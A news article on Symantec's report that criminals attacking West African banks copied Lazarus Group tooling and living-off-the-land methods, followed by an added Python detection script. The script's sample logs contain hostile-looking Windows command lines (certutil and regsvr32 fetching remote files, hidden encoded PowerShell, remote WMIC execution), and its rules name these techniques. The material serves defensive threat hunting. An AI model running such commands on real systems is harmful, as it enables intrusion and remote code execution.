Bank vault. Photo: Matjaz Slanic/Getty Images

A cluster of attempted digital robberies at West African financial institutions appears to have been imitating the North Korea-linked Lazarus Group's run of bank heists, according to Symantec.

Why it matters: Lazarus, internationally notorious for the Sony hack and the WannaCry malware, is currently very active in stealing funds to support the Kim Jong-un regime. The Symantec finding is a striking example of how tactics trickle down from nation-state operators to ordinary criminals.

The big picture: "It seems like after the high public profile of the North Korea thefts, these hackers took those tactics," said Jon DiMaggio, a senior threat intelligence analyst at Symantec.

Details:

  • The Lazarus Group has abused the SWIFT interbank messaging network, which banks use to send payment instructions to one another, in several high-profile thefts, but the attacks Symantec documented did not.
  • What they did use was a set of tools similar to those Lazarus used to stage those attacks, as outlined in a 2017 alert.
  • Symantec did not want to publicly specify the exact tools that were used.

Background: DiMaggio said this isn't the first time he has seen hackers influenced by a high-profile Lazarus attack. After the group's most famous heist, the theft of $81 million from the central bank of Bangladesh, a separate criminal group added SWIFT fraud to its toolkit.

Symantec's report outlined four distinct clusters of attack activity currently being used against African targets that may represent more than one criminal group.

  • The first, the one flagged as resembling the tooling behind the Lazarus SWIFT heists, targeted firms in Ivory Coast and Equatorial Guinea.
  • All four clusters used a mix of easily purchasable malware and "living off the land" techniques: avoiding detection by relying as much as possible on software already present on victims' computers (built-in administrative tools and scripting engines) during the break-in, so the activity blends in with legitimate use.
  • The other clusters spanned Ivory Coast, Ghana, the Democratic Republic of the Congo and Cameroon.

Historically, West African financial groups have not been common targets for hackers, according to the Symantec report. DiMaggio believes that a softer regulatory structure may have made African banks a tempting target.

The bottom line: DiMaggio stressed that IT staff globally have to become more accustomed to looking for living-off-the-land attacks that don't appear to create suspicious network traffic. "You have to look at legitimate traffic," he said. "You can't just wait for a warning screen to flash red."
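What "looking at legitimate traffic" means in practice, as an added example that is not from Symantec's report or this article: a small Python hunt over constructed Sysmon-style process-creation records that flags abuse of built-in Windows binaries (certutil downloads, encoded PowerShell, regsvr32 scriptlets, remote WMIC execution) and Office applications spawning command interpreters. The records, the 203.0.113.x addresses and the rule names are made up for the example; the patterns are common illustrative living-off-the-land indicators, not the undisclosed tools Symantec observed.

```python
import re
from typing import Dict, List

# Constructed Sysmon-style process-creation records (Event ID 1 fields), pipe-separated.
# Sample data written for this example; not logs from the incidents Symantec described.
SAMPLE_EVENTS = [
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\notepad.exe|CommandLine=notepad.exe notes.txt",
    r"ParentImage=C:\Program Files\Microsoft Office\WINWORD.EXE|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd.exe /c certutil -urlcache -split -f http://203.0.113.10/up.dat C:\Users\Public\up.dat",
    r"ParentImage=C:\Windows\System32\cmd.exe|Image=C:\Windows\System32\certutil.exe|CommandLine=certutil -urlcache -split -f http://203.0.113.10/up.dat C:\Users\Public\up.dat",
    r"ParentImage=C:\Windows\System32\cmd.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -nop -w hidden -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\regsvr32.exe|CommandLine=regsvr32.exe /s /n /u /i:http://203.0.113.10/a.sct scrobj.dll",
    r"ParentImage=C:\Windows\System32\services.exe|Image=C:\Windows\System32\svchost.exe|CommandLine=svchost.exe -k netsvcs",
    r"ParentImage=C:\Windows\System32\cmd.exe|Image=C:\Windows\System32\wbem\WMIC.exe|CommandLine=wmic /node:FS01 process call create cmd.exe /c net use",
    r"ParentImage=C:\Windows\System32\cmd.exe|Image=C:\Windows\System32\certutil.exe|CommandLine=certutil -hashfile C:\setup.msi SHA256",
]

# (rule name, regex over the image basename, regex over the full command line).
# Illustrative indicators of built-in binaries being used for download, execution or
# lateral movement; a real deployment would tune these against the environment's baseline.
LOLBIN_RULES = [
    ("certutil_download", r"^certutil(\.exe)?$", r"-urlcache|-decode|-encode"),
    ("powershell_encoded", r"^powershell(\.exe)?$", r"-e(nc(odedcommand)?)?\s|-w(indowstyle)?\s+hidden|downloadstring"),
    ("regsvr32_squiblydoo", r"^regsvr32(\.exe)?$", r"/i:https?://|scrobj\.dll"),
    ("mshta_remote", r"^mshta(\.exe)?$", r"https?://|javascript:|vbscript:"),
    ("rundll32_script", r"^rundll32(\.exe)?$", r"javascript:|https?://"),
    ("wmic_remote_exec", r"^wmic(\.exe)?$", r"/node:\S+.*process\s+call\s+create"),
    ("bitsadmin_transfer", r"^bitsadmin(\.exe)?$", r"/transfer|/addfile"),
]

# Office documents should not normally launch interpreters; that parent/child pair is
# a classic sign of a macro or exploit stage even when every binary involved is signed.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETER_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                        "mshta.exe", "rundll32.exe", "regsvr32.exe"}


def parse_event(line: str) -> Dict[str, str]:
    """Split one 'Key=Value|Key=Value' record into a dict."""
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event matches (empty list if benign)."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits = [name for name, image_re, cmd_re in LOLBIN_RULES
            if re.search(image_re, image, re.I) and re.search(cmd_re, cmd, re.I)]
    if parent in OFFICE_PARENTS and image in INTERPRETER_CHILDREN:
        hits.append("office_spawned_interpreter")
    return hits


def hunt(lines: List[str]) -> List[Dict[str, object]]:
    """Run every rule over the records and keep only the events that matched."""
    findings = []
    for line in lines:
        event = parse_event(line)
        hits = evaluate(event)
        if hits:
            findings.append({"image": basename(event.get("Image", "")),
                             "rules": hits,
                             "command": event.get("CommandLine", "")})
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(f"{', '.join(finding['rules']):28s} {finding['image']:15s} {finding['command']}")
```

Run as-is the script flags five of the eight constructed records and leaves notepad, svchost and the legitimate `certutil -hashfile` invocation alone: the point is that nothing here is malware, so no antivirus "warning screen" fires, and the signal is in the combination of which trusted binary ran, what it was asked to do, and what launched it.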
